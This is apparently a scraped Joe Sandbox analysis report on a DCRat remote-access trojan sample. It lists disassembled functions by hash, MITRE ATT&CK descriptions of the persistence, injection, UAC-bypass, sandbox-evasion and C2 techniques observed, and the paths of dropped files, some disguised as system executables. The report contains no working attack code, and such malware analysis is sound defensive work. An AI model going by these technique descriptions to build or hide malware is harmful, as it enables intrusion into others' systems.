Opcode Fuzzy Hash: 3dd96bd916fef20a70f7b349ac334d96488f5dec95fde2784c20f9de59775dd1
Instruction Fuzzy Hash: 15119070C0964A8FFB58DB64C45D6F9BBE0EF5A304F0044BAD01EC6196DE2595448740

Function 00007FFAAC463515 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf0375b04a1752235a06efd61722535cceecce436253e5caa8b417257889a339
Instruction ID: 65545caf16ae6e6b381e3cf19f4beb361d6cf941bc97417d59a65e8fa06d96f0
Opcode Fuzzy Hash: cf0375b04a1752235a06efd61722535cceecce436253e5caa8b417257889a339
Instruction Fuzzy Hash: 61117C709196CE8FEB58EB28C4596BEBBE0FF19315F4048BED41EC71A6DA34A5448740

Function 00007FFAAC46286D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bba50f9467dacb4807481cadd6b2e2b102fff109e1ec1c7bcac7d398cec33e3
Instruction ID: 69078b8c440f504a305fc50ec213f95bdd8a84f60f8c41dcdbccfc750b6b96f9
Opcode Fuzzy Hash: 3bba50f9467dacb4807481cadd6b2e2b102fff109e1ec1c7bcac7d398cec33e3
Instruction Fuzzy Hash: 2C01D47090964D9FF760EB24884C5B9BBE0FF5A305F0186B6D40CC619AEE38E0888744

Function 00007FFAAC461C05 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a9a6dec13b409ecdbc82ea5dfb9651e8609c3d21e4e698969b0d5081bb3f811
Instruction ID: a70961cff3f67db2ce4e77afd2326d25a31d1a479f2c7f6598a702db4f689ef2
Opcode Fuzzy Hash: 7a9a6dec13b409ecdbc82ea5dfb9651e8609c3d21e4e698969b0d5081bb3f811
Instruction Fuzzy Hash: 3B01AD7080AB8ECFEB989F2484596BABBA0FF56309F4440BAD80DC6196CA35D594C780

Function 00007FFAAC462F09 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6e1bedf883619d64c1f265498a5c3eed2931cdf2b47d67ab7ee4475e8f632d5
Instruction ID: b4a6ce76f3b5cb69b945757c9a8b2b9c30ec577511f346c319961c662d5aaa0c
Opcode Fuzzy Hash: b6e1bedf883619d64c1f265498a5c3eed2931cdf2b47d67ab7ee4475e8f632d5
Instruction Fuzzy Hash: DD01D83090D6899FF756E734C45D6A9FBE0EF4A304F0585F6C40DC70AADA28E458C741

Function 00007FFAAC4605D8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fc769a99c65f6a44209c9a1e5935dc1e0e468e3f147a75c0d61f9a3f8fc5b4c
Instruction ID: 8d3ef18e7bf273f7a5fedd9ae8a367b53ac46e782f069e27a689ad85809e153b
Opcode Fuzzy Hash: 0fc769a99c65f6a44209c9a1e5935dc1e0e468e3f147a75c0d61f9a3f8fc5b4c
Instruction Fuzzy Hash: 6701FF30909A4ECFEB88EF24C09D6BEB7A1EF59309F50847ED40ED2199CA35E555CB84

Function 00007FFAAC460610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 714a2ac0ba90fba1cb89abe6c18df09701e3f30831cdfb761dd6f95a6a718674
Instruction ID: 9e23e3d155977ef60b120e65bd5b5f23067d80d89d36a4e34a2ed1f7d3527b22
Opcode Fuzzy Hash: 714a2ac0ba90fba1cb89abe6c18df09701e3f30831cdfb761dd6f95a6a718674
Instruction Fuzzy Hash: 8101A23080590EDBEB58EB24C4495B9B2A0FF19309F1089BED40EC22D5DF35A554C640

Function 00007FFAAC460608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2947bb5640b1c12c8595007788a70fae046ec7e6171708db6a6578bf98e04aa
Instruction ID: 0052a3c9a18c7c6a713ff0d323684eca59b71553d7afc997ed55faff58738844
Opcode Fuzzy Hash: c2947bb5640b1c12c8595007788a70fae046ec7e6171708db6a6578bf98e04aa
Instruction Fuzzy Hash: F8016D7095590DAFEB58EB34C458ABAF3A0FF1930AF5088BED40EC21D5DE35A194C640

Function 00007FFAAC4611B0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be81907821fd85e9b55b5f151655e280dd077d10240cc241dacbd8026da50db7
Instruction ID: 44b262dd94c028ecd8b6ea98e332bf4d77362e2ec65d6ec1a015d25dd5c91fcc
Opcode Fuzzy Hash: be81907821fd85e9b55b5f151655e280dd077d10240cc241dacbd8026da50db7
Instruction Fuzzy Hash: 26F0AF70C1A65ECBFB989B74981C6F9B6E0FF46208F40443AE41ED20C5EE2491188684

Function 00007FFAAC462789 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f195266d9b4a14536c2d2336950099b5596fec3a592fc3671b032ee99132be5
Instruction ID: 6a262fe524cfdece5d7e18332cf613cc5b3c629a5b27016302d032433fb5cf4f
Opcode Fuzzy Hash: 5f195266d9b4a14536c2d2336950099b5596fec3a592fc3671b032ee99132be5
Instruction Fuzzy Hash: FDF0C271D0E7898FEB699F34C8686B9FB60FF06205F0449BEE40AC50D6DB389458C791

Function 00007FFAAC4627FD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5baeaaaccad69c182a42bb5661ccd26c513b0193d82f6295a25940a2988262cf
Instruction ID: 8b5e982a5c3ab2014fe915d508b76075e61d7dc5d83ae48c97711a639ca46eff
Opcode Fuzzy Hash: 5baeaaaccad69c182a42bb5661ccd26c513b0193d82f6295a25940a2988262cf
Instruction Fuzzy Hash: 7AF0F67080E6898FE7689F2088191B9BBA0FF16208F4045BED40DC11D5DB39D418C340

Function 00007FFAAC460F69 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b642a58796442ad66f5e131411e5f9aba3a8adf8fde6756a0b4f0f24873712f
Instruction ID: 0f2d4b35a45b594caf63f5e796f17a8a07afc18884e62f9a0538b29a4dec965c
Opcode Fuzzy Hash: 3b642a58796442ad66f5e131411e5f9aba3a8adf8fde6756a0b4f0f24873712f
Instruction Fuzzy Hash: 8BF0DA3090950DCBEB14EB14C958BEDB7F1FB58315F2082A6C40AE3299DE74AE458F88

Function 00007FFAAC461710 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7697d30d3ff66851e22e765c2d8baca311a2714aa173fdf003b095cf79fb639b
Instruction ID: 183bb7164ec2cd9e4bcb04abe0d9f792dd7deb6d4170223208d694b99870d6cb
Opcode Fuzzy Hash: 7697d30d3ff66851e22e765c2d8baca311a2714aa173fdf003b095cf79fb639b
Instruction Fuzzy Hash: 69E06520D0A406C7F6685318C08C774E1D19B4230CF78C675F01CC61E9EA28EC8AD245

Function 00007FFAAC463F81 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6315cc91b8e75b66df8c4be6358f6a678409d4bbef723bb2de543bc30615a5dc
Instruction ID: 501f7ab5543ccad2280157e7c1b83451053a744f91972fdc2ee144e5c8f7b007
Opcode Fuzzy Hash: 6315cc91b8e75b66df8c4be6358f6a678409d4bbef723bb2de543bc30615a5dc
Instruction Fuzzy Hash: 4DE02670D1A96D9FEBB4DF188C547AAF6B1EF5A706F1040E5800DD2295DA345A848F84

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report cvXu2RR10n.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\Recovery\2afe4ed40d5a86

C:\Recovery\7aa03be75bb09d

C:\Recovery\smartscreen.exe

C:\Recovery\smartscreen.exe:Zone.Identifier

C:\Recovery\vAJjQbsDlJtvByBkfqttADkNAptf.exe

C:\Recovery\vAJjQbsDlJtvByBkfqttADkNAptf.exe:Zone.Identifier

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ApplicationFrameHost.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cvXu2RR10n.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\smartscreen.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
cvXu2RR10n.exe